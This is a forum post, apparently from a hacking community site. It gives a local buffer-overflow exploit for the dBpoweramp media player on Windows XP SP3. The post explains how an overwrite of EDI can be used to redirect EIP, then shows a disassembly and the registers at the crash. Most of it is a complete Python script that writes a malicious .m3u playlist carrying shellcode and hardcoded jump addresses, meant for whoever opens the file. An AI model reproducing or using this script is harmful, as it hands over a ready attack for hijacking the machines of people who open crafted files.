• dbpwoerammpl local exploit a different scenario

    # Exploit Title: dbpoweramp local buffer overflow, a different approch
    # Date: 31/8/2010
    # Author: 41.w4r10r and FB1H2S
    # Software Link: http://usfiles.brothersoft.com/mp3_a...owerAMP-r2.exe
    # Version: [app version]
    # Tested on: Microsoft XP service pack 3
    # CVE : http://cve.mitre.org/cgi-bin/cvename...=CVE-2008-0661

    The local exploit which was published http://www.exploit-db.com/exploits/5069 http://www.exploit-db.com/exploits/5067, the software had an overflow,
    which could be exploited if passed in with a 255 char string, it would overwrite the EIP, but if the string goes above 255 the EIP wont be
    overwritten insted the EDI would be. The published exploit uses a direct EIP overwrite using a 255 char ( shellcode + junk ).
    But it is possible to exploit the appplication with a 255+ char in the follwoing way.

    1) 270 chars overwrite the EDI and EIP remains intact
    2) EDI Destination index points to our junk now, and we got controll over EDI
    3) EDI points to a data, so overwrite it to point to EDX which also hold our junk, a jump EDX will work
    4) Now EIP will be overwritten, so on second step make EIP point to EDI and we could run our arbitary code.

    ################################################## ##############################################
    At the time of 255+ char the assembled code gives idea whats happening
    ################################################## ##############################################
    Code:
    00422BD0  /$ 56             PUSH ESI
    00422BD1  |. 57             PUSH EDI
    00422BD2  |. 8B7C24 0C      MOV EDI,DWORD PTR SS:[ESP+C]
    00422BD6  |. 83C9 FF        OR ECX,FFFFFFFF
    00422BD9  |. 33C0           XOR EAX,EAX
    00422BDB  |. 6A 5C          PUSH 5C                                  ; /c = 5C  ('\')
    00422BDD  |. F2:AE          REPNE SCAS BYTE PTR ES:[EDI]             ; | Repeat and 
    00422BDF  |. 8B4424 14      MOV EAX,DWORD PTR SS:[ESP+14]            ; |
    00422BE3  |. F7D1           NOT ECX                                  ; |
    00422BE5  |. 2BF9           SUB EDI,ECX                              ; |
    00422BE7  |. 50             PUSH EAX                                 ; |s
    00422BE8  |. 8BD1           MOV EDX,ECX                              ; |
    00422BEA  |. 8BF7           MOV ESI,EDI                              ; |
    00422BEC  |. 8BF8           MOV EDI,EAX                              ; |
    00422BEE  |. C1E9 02        SHR ECX,2                                ; |
    00422BF1  |. F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>; |
    00422BF3  |. 8BCA           MOV ECX,EDX                              ; |
    00422BF5  |. 83E1 03        AND ECX,3                                ; |
    00422BF8  |. F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; |
    00422BFA  |. FF15 E4A14200  CALL DWORD PTR DS:[<&MSVCRT.strrchr>]    ; \strrchr
    00422C00  |. 83C4 08        ADD ESP,8
    
    #The registers at the time of the oveflow
    
    EAX 00000000
    ECX FFFFFFFF
    EDX 00B9ECD8 ASCII "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+[Our Junk]
    EBX 00B9F110 ASCII "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+[Our Junk]
    ESP 00B9ECB4
    EBP 77C3F931 msvcrt.sprintf
    ESI 00B9F285
    EDI 41414141
    EIP 00422BDD Amp.00422BDD
    C 0  ES 0023 32bit 0(FFFFFFFF)
    P 1  CS 001B 32bit 0(FFFFFFFF)
    A 0  SS 0023 32bit 0(FFFFFFFF)
    Z 1  DS 0023 32bit 0(FFFFFFFF)
    S 0  FS 003B 32bit 7FFDC000(FFF)
    T 0  GS 0000 NULL
    D 0
    O 0  LastErr ERROR_SUCCESS (00000000)
    EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
    ST0 empty -??? FFFF 00000000 7C90E920
    ST1 empty +UNORM 0060 00140000 00000000
    ST2 empty 0.0000000076189029870e-4933
    ST3 empty 0.0208724709907450280e-4933
    ST4 empty +UNORM 770A 0012F850 00000000
    ST5 empty 0.0208724786043381110e-4933
    ST6 empty +UNORM 2CCE 0012F588 00890000
    ST7 empty -??? FFFF 7C919318 7C90E920
                   3 2 1 0      E S P U O Z D I
    FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
    FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
    ################################################## ################################################## ################
    Code:
    ##########
    #!/usr/bin/python
    #
    #And all greets to Garage Hackers Members.
    #http://www.garage4hackers.com
    #And shouts to ICW, Andhra Hackers members
    #
    #and our Brothers:-
    #B0Nd,Eberly,Wipu,beenu,w4ri0r,empty,neo,Rohith,Sids786,SmartKD,Tia,h@xor,r5scal,Yash,Secure_IT, Atul, Vinnu and all others. 
    #
    #
    #
    #
    shellcode= ("\x90\x90\xcc\x90\x90\x90\x90\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
    "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
    "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" 
    "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" 
    "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" 
    "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" 
    "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" 
    "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" 
    "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" 
    "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
    "\x7f\xe8\x7b\xca\x90\x90\x90\x90\x90\x90")
    leng=260-len(shellcode)
    junk = shellcode+"D"*leng
    print len(junk)
    junk=junk+"\xF0\xB0\x80\x7C"+"DCBA\xD8\xEC\xB9\x00"
    #######################################################################################################################
    #Make EDI point to EDX using a jump EDX, DCBA\xD8\xEC\xB9\x00 from application
    #now we ill get controll over EIP Now point EIP point to EDI [ #jmp edi \xF0\xB0\x80\x7C from kernal 32.dll Microsoft Service pack 3 ] 
    #######################################################################################################################
    filename = "garage4hackers.m3u";
    file = open(filename,"w")   
    file.writelines(junk)
    file.close()
    print "File Is created"
    print "Press Any Key To Continue........."
    raw_input()
    This article was originally published in forum thread: dbpwoerammpl local exploit a different scenario started by fb1h2s View original post
  • G4H Facebook

  • G4H Twitter